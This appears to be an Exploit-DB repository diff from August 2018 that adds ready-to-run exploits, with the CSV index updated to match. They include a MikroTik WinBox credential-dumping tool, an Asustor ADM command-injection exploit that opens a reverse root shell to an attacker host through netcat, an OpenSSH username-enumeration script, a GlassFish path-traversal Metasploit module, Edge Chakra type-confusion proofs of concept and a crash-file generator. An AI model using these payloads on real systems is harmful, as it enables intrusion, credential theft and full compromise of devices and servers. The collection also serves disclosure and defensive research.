DB: 2018-08-18

10 changes to exploits/shellcodes

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
Microsoft Edge Chakra JIT - Scope Parsing Type Confusion
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)

Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection

ADM 3.1.2RHG1 - Remote Code Execution

exploits/hardware/webapps/45209.go

@@ -0,0 +1,234 @@
+/*
+
+# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
+# Author: Maxim Yefimenko ( @slider )
+# Date: 2018-08-06
+# Sotware Link: https://mikrotik.com/download
+# Vendor Page: https://www.mikrotik.com/
+# Version: 6.29 - 6.42
+# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
+# CVE: CVE-2018-14847
+# References:
+# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
+# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
+# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
+# and special thanks to Dmitriy_Area51
+
+*/
+
+package main
+
+import (
+	"crypto/md5"
+	"fmt"
+	"net"
+	"os"
+	"strings"
+	"time"
+)
+
+var (
+	a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
+		0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
+		0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
+		0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
+		0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
+		0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
+		0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
+		0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
+		0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
+		0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
+		0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
+		0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
+		0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
+		0x00, 0x00}
+
+	b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
+		0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
+		0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
+		0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
+		0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
+		0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
+		0x00, 0x02, 0x00, 0x00, 0x00}
+
+	buf = make([]byte, 1024*8)
+)
+
+func checkErr(err error) {
+	if err != nil {
+		fmt.Println("Error:" + err.Error())
+	}
+}
+
+func decryptPassword(user []byte, passEnc []byte) string {
+	var passw []byte
+	hasher := md5.New()
+	hasher.Write(user)
+	hasher.Write([]byte("283i4jfkai3389"))
+	key := hasher.Sum(nil)
+
+	for i := 0; i < len(passEnc); i++ {
+		passw = append(passw, passEnc[i]^key[i%len(key)])
+	}
+
+	return string(ASCIIonly(passw))
+}
+
+func ASCIIonly(s []byte) []byte {
+	for i, c := range s {
+		if c < 32 || c > 126 {
+			return s[:i]
+		}
+	}
+	return s
+}
+
+func extractPass(buff []byte) (s []string) {
+	var (
+		usr []byte
+		pwd []byte
+	)
+
+	//searching for StartOfRecord
+	for i := 0; i < len(buff); i++ {
+
+		if i+2 >= len(buff) {
+			break
+		}
+
+		if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
+			// fmt.Printf("Probably user record at offset 0x%.5x\n", i)
+
+			//some bytes ahead is enable/disable flag
+			i += int((buff[i+2] - 5))
+			if i >= len(buff) {
+				break
+			}
+
+			//searching for StartOfRecNumber
+			if i+3 >= len(buff) {
+				break
+			}
+
+			for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
+				i++
+				if i+3 >= len(buff) {
+					break
+				}
+			}
+
+			i += 4
+			if i >= len(buff) {
+				break
+			}
+			// fmt.Printf("SORn: 0x%X\n", i)
+
+			// comment?
+			i += 18
+			if (i + 4) >= len(buff) {
+				break
+			}
+			if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
+				if (i+1)+int(buff[i]) >= len(buff) {
+					break
+				}
+				i += int(buff[i])
+			} else {
+				i -= 18
+			}
+
+			//searching for StartOfPassword
+			if i+4 >= len(buff) {
+				break
+			}
+
+			for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
+				i++
+				if i+4 >= len(buff) {
+					break
+				}
+			}
+			i += 5
+			if (i + 3) >= len(buff) {
+				break
+			}
+
+			if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
+				pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
+				i += int(buff[i-1])
+			}
+
+			//searching for StartOfUsername
+			if i+3 >= len(buff) {
+				break
+			}
+			for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
+				i++
+				if i+3 >= len(buff) {
+					break
+				}
+			}
+
+			i += 4
+			if i >= len(buff) {
+				break
+			}
+			if buff[i] != 0x00 {
+				if i+int(buff[i]) >= len(buff) {
+					break
+				}
+
+				usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
+				i += int(buff[i])
+			}
+
+			decrypted := decryptPassword(usr, pwd)
+			//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)
+
+			if len(usr) != 0 {
+				s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
+			}
+
+		}
+	}
+
+	return s
+}
+
+func main() {
+
+	if len(os.Args) < 2 {
+		fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
+		os.Exit(0)
+	}
+
+	conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))
+
+	if err != nil {
+		fmt.Println(err.Error())
+		return
+	}
+
+	defer conn.Close()
+
+	conn.Write(a)
+	reqLen, err := conn.Read(buf)
+	checkErr(err)
+	if reqLen < 38 {
+		panic("First packet is too small")
+	}
+
+	b[19] = buf[38]
+
+	conn.Write(b)
+	reqLen, err = conn.Read(buf)
+	checkErr(err)
+	db := buf[:reqLen]
+
+	s := extractPass(db)
+	for i, acc := range s {
+		data := strings.SplitN(acc, ":", 2)
+		fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
+	}
+}

exploits/hardware/webapps/45212.py

@@ -0,0 +1,95 @@
+# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
+# Author: Matthew Fulton & Kyle Lovett
+# Date: 2018-07-01
+# Vendor Homepage: https://www.asustor.com/
+# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
+# Version: <= ADM 3.1.2RHG1
+# Tested on: ASUSTOR AS6202T
+# CVE : CVE-2018-11510
+# References: 
+# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
+
+#!/usr/bin/python
+
+"""
+CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
+This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette 
+if exploitation occurs successfully, a root shell is granted 
+Authors: matthew fulton and Kyle Lovett
+Date: 27 May 2018
+Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
+to Asustor that Asustor hasn't acknowledge nor apparenlty fixed. 
+After a twitter communication Kyle was kind enough to share a few details
+exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
+Vendor link: https://www.asustor.com
+
+Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
+exploit for an unauthenticated OS command injection vulnerability that effects
+Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
+authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
+starting netcat listener on port 1234
+/bin/sh: can't access tty; job control turned off
+/volume0/usr/builtin/webman/portal/apis # uname -a;id
+/bin/sh: can't access tty; job control turned off
+/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
+uid=0(root) gid=0(root) groups=0(root)
+"""
+
+import sys, threading, time, os, subprocess
+import urllib2
+import ssl
+import argparse
+
+
+class exploit(object):
+	def __init__(self,interval=1):
+		self.target = args.target
+		self.rport = args.port
+		self.lport = args.lport
+		self.remote = args.remote
+		self.interval = interval
+		thread = threading.Thread(target=self.run, args=())
+		thread.daemon = True
+		thread.start()
+
+	def run(self):
+		#ignore ssl warnings
+		ctx = ssl.create_default_context()
+		ctx.check_hostname = False
+		ctx.verify_mode = ssl.CERT_NONE 
+		while True:
+			try:
+				turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
+				"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
+				"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
+				"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
+				"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
+				response=urllib2.urlopen(turl,context=ctx)
+				time.sleep(self.interval)
+			except urllib2.URLError as e:
+				print "Something is wrong:|"
+				print e
+				os._exit(1)
+
+def revShell():
+	print "starting netcat listener on port "+args.lport
+	cmd = "nc -lv {0}".format(args.lport)
+	os.system(cmd)
+
+def main():
+	print """exploit for an unauthenticated OS command injection vulnerability that effects 
+Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
+authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
+	goexploit = exploit()
+	revShell()
+
+if __name__ == '__main__':
+	Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
+	authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
+	parser=argparse.ArgumentParser(description=help)
+	parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
+	parser.add_argument('--port', '-p', default="8001")
+	parser.add_argument('--lport', '-l', default="1234")
+	parser.add_argument('--remote','-r', default="192.168.1.253")
+	args = parser.parse_args()
+	main()

exploits/linux/remote/45210.py

@@ -0,0 +1,84 @@
+#!/usr/bin/env python
+
+# Copyright (c) 2018 Matthew Daley
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+
+
+import argparse
+import logging
+import paramiko
+import socket
+import sys
+
+
+class InvalidUsername(Exception):
+    pass
+
+
+def add_boolean(*args, **kwargs):
+    pass
+
+
+old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
+        paramiko.common.MSG_SERVICE_ACCEPT]
+
+def service_accept(*args, **kwargs):
+    paramiko.message.Message.add_boolean = add_boolean
+    return old_service_accept(*args, **kwargs)
+
+
+def userauth_failure(*args, **kwargs):
+    raise InvalidUsername()
+
+
+paramiko.auth_handler.AuthHandler._handler_table.update({
+    paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
+    paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
+})
+
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+arg_parser = argparse.ArgumentParser()
+arg_parser.add_argument('hostname', type=str)
+arg_parser.add_argument('--port', type=int, default=22)
+arg_parser.add_argument('username', type=str)
+args = arg_parser.parse_args()
+
+sock = socket.socket()
+try:
+    sock.connect((args.hostname, args.port))
+except socket.error:
+    print '[-] Failed to connect'
+    sys.exit(1)
+
+transport = paramiko.transport.Transport(sock)
+try:
+    transport.start_client()
+except paramiko.ssh_exception.SSHException:
+    print '[-] Failed to negotiate SSH transport'
+    sys.exit(2)
+
+try:
+    transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
+except InvalidUsername:
+    print '[*] Invalid username'
+    sys.exit(3)
+except paramiko.ssh_exception.AuthenticationException:
+    print '[+] Valid username'

exploits/linux/webapps/45198.rb

@@ -0,0 +1,74 @@
+# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
+# Author: Dhiraj Mishra
+# Date: 2018-08-14
+# Software: Oracle Glassfish Server OSE
+# Version: 4.1
+# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
+# CVE: 2017-1000028
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exits in administration console of Oracle GlassFish Server 4.1, which is
+        listening by default on port 4848/TCP.
+      },
+      'References'  =>
+        [
+          ['CVE', '2017-1000028'],
+          ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
+          ['EDB', '39441']
+        ],
+      'Author'      =>
+        [
+          'Trustwave SpiderLabs', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => 'Aug 08 2015',
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(4848),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "%c0%af.." * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/theme/META-INF/prototype#{traversal}"
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'oracle.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end

exploits/windows/dos/45213.js

@@ -0,0 +1,31 @@
+/*
+If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
+
+In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
+
+PoC:
+*/
+
+function opt(arr, obj) {
+    arr[0] = 1.1;
+    obj.x;
+    arr[0] = 2.3023e-320;
+}
+
+let arr = [1.1];
+for (let i = 0; i < 0x10000; i++) {
+    opt(arr, {});
+}
+
+let get = Map.prototype.get;
+Map.prototype.get = function (key) {
+    Map.prototype.get = get;
+
+    arr[0] = {};
+
+    return this.get(key);
+};
+
+opt(arr, Intl);
+
+alert(arr[0]);

exploits/windows/dos/45214.js

@@ -0,0 +1,79 @@
+// PoC:
+
+async function trigger(a = class b {
+    [await 1]() {
+    }
+}) {
+}
+
+let spray = [];
+for (let i = 0; i < 100000; i++) {
+    spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
+}
+
+trigger();
+
+/*
+The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
+
+Here's the generated bytecode.
+
+Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
+      18 locals (8 temps from R10), 5 inline cache
+    Constant Table:
+    ======== =====
+     R1 LdRoot    
+     R2 LdC_A_I4   int:1 
+     R3 Ld_A       (undefined)
+     R4 LdFalse   
+    
+    Implicit Arg Ins:
+    ======== === ===
+     R5 ArgIn_A    In1
+    
+    0000   InitUndecl           R6 
+    0002   TryCatch             x:004c (  71) 
+
+
+  Line   1: a = class b {
+  Col   24: ^
+    0005   BrSrNeq_A            x:0048 (  62)  R5  R3 
+    000a   NewScFunc            R13 = b()
+    000d   InitClass            R13 
+    0012   ProfiledLdFld        R14 = R13.prototype #0 <0> 
+    0016   SetHomeObj           R13  R14 
+    001b   NewScObjectSimple    R9 
+    001d   ProfiledStFld        R9.value = R2 #1 <1> 
+    0021   ProfiledStFld        R9.done = R4 #2 <2> 
+    0025   Yield                R9  R9   <<-----------------------------------------------
+    0028   ResumeYield          R15  R9 
+    002b   NewScFunc            R16 = b.prototype[]()
+    002e   SetComputedNameVar   R16  R15 
+    0033   ProfiledLdFld        R14 = R13.prototype #0 <0> 
+    0037   InitClassMemberComputedName R14[R15] = R16
+    003d   SetHomeObj           R16  R14 
+    0042   InitConst            R6  R13 
+    0045   Ld_A                 R5  R13 
+    0048   Leave               
+    0049   Br                   x:0074 (  40) 
+    004c   Catch                R10 
+    004e   Nop                 
+    004f   ProfiledLdRootFld    R11 = root.Promise #4 <4> 
+    0055   ProfiledLdMethodFld  R12 = R11.reject #3 <3> 
+    0059   StartCall            ArgCount: 2
+    005c   ArgOut_A             Out0 = R11 
+    005f   ArgOut_A             Out1 = R10 
+    0062   ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3>  <0> 
+    006c   Ld_A                 R0  R12 
+    006f   Leave               
+    0070   Br                   x:0076 (   3) 
+    0073   Leave               
+    0074   LdUndef              R0 
+
+
+  Line   5: }
+  Col    1: ^
+    0076   Ret              
+
+Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
+*/

exploits/windows/dos/45215.js

@@ -0,0 +1,38 @@
+/*
+Here's the method.
+    template <typename TPropertyIndex>
+    template <typename TPropertyIndexFrom>
+    void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
+    {
+        this->Attributes = descriptor.Attributes;
+        this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
+        this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
+        this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
+        this->IsAccessor = descriptor.IsAccessor;
+
+#if ENABLE_FIXED_FIELDS
+        this->IsInitialized = descriptor.IsInitialized;
+        this->IsFixed = descriptor.IsFixed;
+        this->UsedAsFixed = descriptor.UsedAsFixed;
+#endif
+    }
+
+Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
+
+PoC:
+*/
+
+let x = 1;
+
+this.x = 0x1234;  // IsShadowed
+
+// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
+for (let i = 0; i < 0x10000; i++) {
+    this['a' + i] = 1;
+}
+
+// Set IsAccessor
+this.__defineSetter__('x', () => {});
+
+// Type confusion
+this.x;

exploits/windows/dos/45216.js

@@ -0,0 +1,26 @@
+/*
+This is similar to  issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for  issue 1531 .
+
+PoC:
+*/
+
+function opt(arr, value) {
+	arr.push(value);  // <--------
+	arr[0] = 2.3023e-320;
+}
+
+function main() {
+    for (let i = 0; i < 0x10000; i++) {
+		let tmp = [1.1, 2.2, 3.3];
+		delete tmp[1];
+
+        opt(tmp, 2.2);
+    }
+
+    let arr = [1.1];
+    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!
+
+    alert(arr);
+}
+
+main();

exploits/windows/dos/45217.js

@@ -0,0 +1,18 @@
+/*
+The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
+
+It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
+
+The initializer for ICU has no check:
+https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
+
+The initializer for WinGlob has a check:
+https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
+
+PoC:
+*/
+
+let object = {};
+Intl.NumberFormat.apply(object);
+Intl.DateTimeFormat.apply(object);
+Intl.DateTimeFormat.prototype.formatToParts.apply(object);

exploits/windows_x86-64/dos/45211.py

@@ -0,0 +1,25 @@
+# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-17
+# Homepage: https://cewe-photoworld.com/
+# Software Link: https://cewe-photoworld.com/creator-software/windows-download
+# Tested Version: 6.3.4
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of 
+# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 4000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6046,9 +6046,15 @@ id,file,description,date,author,type,platform,port
 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
 45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
-45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
+45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80
 45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
 45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
+45211,exploits/windows_x86-64/dos/45211.py,"CEWE Photoshow 6.3.4 - Denial of Service (PoC)",2018-08-17,"Gionathan Reale",dos,windows_x86-64,
+45213,exploits/windows/dos/45213.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl",2018-08-17,"Google Security Research",dos,windows,
+45214,exploits/windows/dos/45214.js,"Microsoft Edge Chakra JIT - Scope Parsing Type Confusion",2018-08-17,"Google Security Research",dos,windows,
+45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
+45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
+45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16693,6 +16699,7 @@ id,file,description,date,author,type,platform,port
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
 45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
+45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39764,6 +39771,7 @@ id,file,description,date,author,type,platform,port
 45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
+45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
 45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
@@ -39802,8 +39810,10 @@ id,file,description,date,author,type,platform,port
 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
+45198,exploits/linux/webapps/45198.rb,"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
